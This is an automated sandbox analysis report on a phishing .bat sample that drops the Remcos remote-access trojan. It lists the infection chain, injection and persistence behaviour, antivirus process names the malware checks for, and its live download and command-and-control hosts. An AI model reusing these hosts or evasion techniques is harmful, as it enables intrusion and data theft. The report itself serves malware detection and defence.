              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FCF70F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,7_2_00007FF68FCF70F4
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF6A0E7586C GetVersion,4_2_00007FF6A0E7586C
              Source: C:\Windows\SysWOW64\SndVol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMCJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H5EBMC
              Yara detected Remcos RAT
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.SndVol.exe.2cf0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 25.2.SndVol.exe.27d0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 23.2.SndVol.exe.2c00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.AnyDesk.PIF.2d30000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AnyDesk.PIF PID: 7748, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 8072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5612, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 7296, type: MEMORYSTR
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC3E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,7_2_00007FF68FC3E568
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC2227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,7_2_00007FF68FC2227C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC45648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,7_2_00007FF68FC45648
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68FC254A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,7_2_00007FF68FC254A0

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		2
              Valid Accounts              		1
              Native API              		1
              Scripting              		1
              DLL Side-Loading              		2
              Disable or Modify Tools              		OS Credential Dumping1
              System Time Discovery              		Remote Services12
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              Data Encrypted for Impact
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading              		2
              Valid Accounts              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop ProtocolData from Removable Media2
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Valid Accounts              		21
              Access Token Manipulation              		12
              Obfuscated Files or Information              		Security Account Manager1
              System Network Connections Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Registry Run Keys / Startup Folder              		312
              Process Injection              		1
              Install Root Certificate              		NTDS1
              File and Directory Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		1
              Timestomp              		LSA Secrets46
              System Information Discovery              		SSHKeylogging2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials241
              Security Software Discovery              		VNCGUI Input Capture212
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
              Masquerading              		DCSync2
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
              Valid Accounts              		Proc Filesystem1
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
              Access Token Manipulation              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd312
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559105 Sample: USD470900_COPY_800BLHSBC882... Startdate: 20/11/2024 Architecture: WINDOWS Score: 100 80 iamblessed.duckdns.org 2->80 82 ferreiragascuritiba.com.br 2->82 84 geoplugin.net 2->84 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 112 Malicious sample detected (through community Yara rule) 2->112 116 13 other signatures 2->116 9 cmd.exe 1 2->9         started        11 Faogvkgh.PIF 2->11         started        14 Faogvkgh.PIF 2->14         started        signatures3 114 Uses dynamic DNS services 80->114 process4 signatures5 16 AnyDesk.PIF 1 6 9->16         started        21 extrac32.exe 1 9->21         started        23 alpha.exe 1 9->23         started        29 5 other processes 9->29 118 Multi AV Scanner detection for dropped file 11->118 120 Early bird code injection technique detected 11->120 122 Machine Learning detection for dropped file 11->122 25 SndVol.exe 11->25         started        124 Allocates memory in foreign processes 14->124 27 SndVol.exe 14->27         started        process6 dnsIp7 72 ferreiragascuritiba.com.br 216.172.172.178, 49706, 49707, 80 UNIFIEDLAYER-AS-1US United States 16->72 56 C:\Users\Public\Libraries\Faogvkgh, data 16->56 dropped 58 C:\Users\Public\Faogvkgh.url, MS 16->58 dropped 86 Multi AV Scanner detection for dropped file 16->86 88 Early bird code injection technique detected 16->88 90 Machine Learning detection for dropped file 16->90 100 3 other signatures 16->100 31 cmd.exe 1 16->31         started        33 SndVol.exe 2 13 16->33         started        37 esentutl.exe 2 16->37         started        60 C:\Users\Public\alpha.exe, PE32+ 21->60 dropped 92 Drops PE files to the user root directory 21->92 94 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 21->94 96 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 21->96 40 kn.exe 3 2 23->40         started        98 Detected Remcos RAT 25->98 42 kn.exe 2 29->42         started        44 extrac32.exe 1 29->44         started        file8 signatures9 process10 dnsIp11 46 esentutl.exe 2 31->46         started        50 esentutl.exe 2 31->50         started        52 conhost.exe 31->52         started        74 iamblessed.duckdns.org 77.221.149.38, 47666, 49709 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 33->74 76 127.0.0.1 unknown unknown 33->76 78 geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands 33->78 102 Detected Remcos RAT 33->102 62 C:\Users\Public\Libraries\Faogvkgh.PIF, PE32 37->62 dropped 54 conhost.exe 37->54         started        104 Registers a new ROOT certificate 40->104 106 Drops PE files with a suspicious file extension 40->106 64 C:\Users\Public\Libraries\AnyDesk.PIF, PE32 42->64 dropped 66 C:\Users\Public\kn.exe, PE32+ 44->66 dropped file12 signatures13 process14 file15 68 C:\Users\Public\alpha.pif, PE32 46->68 dropped 126 Drops PE files to the user root directory 46->126 128 Drops PE files with a suspicious file extension 46->128 130 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 46->130 70 C:\Users\Public\xpha.pif, PE32 50->70 dropped signatures16

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              USD470900_COPY_800BLHSBC882001.PDF.bat18%ReversingLabsScript-BAT.Trojan.Remcos

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\Public\Libraries\AnyDesk.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\Faogvkgh.PIF100%Joe Sandbox ML
              C:\Users\Public\Libraries\AnyDesk.PIF32%ReversingLabsWin32.Trojan.Generic
              C:\Users\Public\Libraries\Faogvkgh.PIF32%ReversingLabsWin32.Trojan.Generic
              C:\Users\Public\alpha.exe0%ReversingLabs
              C:\Users\Public\alpha.pif0%ReversingLabs
              C:\Users\Public\kn.exe0%ReversingLabs
              C:\Users\Public\xpha.pif0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqn0%Avira URL Cloudsafe
              http://ferreiragascuritiba.com.br/v/233_Faogvkghvqnath0%Avira URL Cloudsafe
              http://ferreiragascuritiba.com.b0%Avira URL Cloudsafe
              iamblessed.duckdns.org0%Avira URL Cloudsafe
              http://ferreiragascuritiba.com.br/0%Avira URL Cloudsafe
              http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnP0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              iamblessed.duckdns.org
              		77.221.149.38
              		truetrue
                		unknown
                ferreiragascuritiba.com.br
                		216.172.172.178
                		truetrue
                  		unknown
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    iamblessed.duckdns.orgtrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://ferreiragascuritiba.com.br/v/233_Faogvkghvqntrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gpfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEPkn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                          		high
                          https://login.microsoftonline.com/%s/oauth2/authorizekn.exefalse
                            		high
                            https://sectigo.com/CPS0AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              https://login.microsoftonline.com/%s/oauth2/tokenkn.exefalse
                                		high
                                http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://geoplugin.net/json.gpl:HSndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://ocsp.sectigo.com0AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      http://ferreiragascuritiba.com.br/v/233_FaogvkghvqnathAnyDesk.PIF, 0000000A.00000002.1493586816.000000000080E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        http://ferreiragascuritiba.com.br:80/v/233_FaogvkghvqnPAnyDesk.PIF, 0000000A.00000002.1493586816.000000000088D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#AnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          http://ferreiragascuritiba.com.br/AnyDesk.PIF, 0000000A.00000002.1493586816.0000000000865000.00000004.00000020.00020000.00000000.sdmptrue
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://enterpriseregistration.windows.net/EnrollmentServer/key/kn.exefalse
                                            		high
                                            http://geoplugin.net/json.gpSystem32SndVol.exe, 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatahkn.exe, 00000007.00000000.1403779482.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1413735928.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1416809661.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1421176999.00007FF68FD1E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drfalse
                                                		high
                                                http://geoplugin.net/SndVol.exe, 00000014.00000003.1535801300.000000001C176000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1537139558.000000001C187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://geoplugin.net/json.gp/CAnyDesk.PIF, 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geoplugin.net/json.gpfH5SndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://geoplugin.net/json.gp.(KSndVol.exe, 00000014.00000002.3879565990.000000001C158000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000014.00000003.1535801300.000000001C158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://ferreiragascuritiba.com.bAnyDesk.PIF, 0000000A.00000002.1517170522.0000000020B1D000.00000004.00001000.00020000.00000000.sdmptrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svckn.exefalse
                                                          		high
                                                          http://www.pmail.comAnyDesk.PIF, AnyDesk.PIF, 0000000A.00000002.1497237334.0000000002B93000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427109635.0000000002B97000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1498326441.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000002.1523550345.000000007FAAF000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000016.00000002.1647310662.0000000002DA2000.00000004.00001000.00020000.00000000.sdmp, Faogvkgh.PIF, 00000018.00000002.1717002790.0000000002E42000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://%ws/%ws_%ws_%ws/service.svc/%wskn.exefalse
                                                              		high
                                                              https://enterpriseregistration.windows.net/EnrollmentServer/device/kn.exefalse
                                                                		high
                                                                http://ocsp.sectigo.com0CAnyDesk.PIF, 0000000A.00000002.1521011738.000000007EED0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1461004903.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1460709581.000000007EAC0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  77.221.149.38
                                                                  		iamblessed.duckdns.orgRussian Federation
                                                                  		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue
                                                                  216.172.172.178
                                                                  		ferreiragascuritiba.com.brUnited States
                                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                                  178.237.33.50
                                                                  		geoplugin.netNetherlands
                                                                  		8455ATOM86-ASATOM86NLfalse

                                                                  Private

                                                                  IP
                                                                  127.0.0.1

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1559105
                                                                  Start date and time:2024-11-20 07:52:12 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 11m 12s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:29
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:USD470900_COPY_800BLHSBC882001.PDF.bat
                                                                  Detection:MAL
                                                                  Classification:mal100.bank.troj.evad.winBAT@41/22@3/4
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 59
                                                                  • Number of non-executed functions: 208
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .bat
                                                                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: USD470900_COPY_800BLHSBC882001.PDF.bat

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  01:53:10API Interceptor2x Sleep call for process: AnyDesk.PIF modified
                                                                  01:53:30API Interceptor2x Sleep call for process: Faogvkgh.PIF modified
                                                                  01:53:53API Interceptor4280827x Sleep call for process: SndVol.exe modified
                                                                  07:53:21AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Faogvkgh C:\Users\Public\Faogvkgh.url
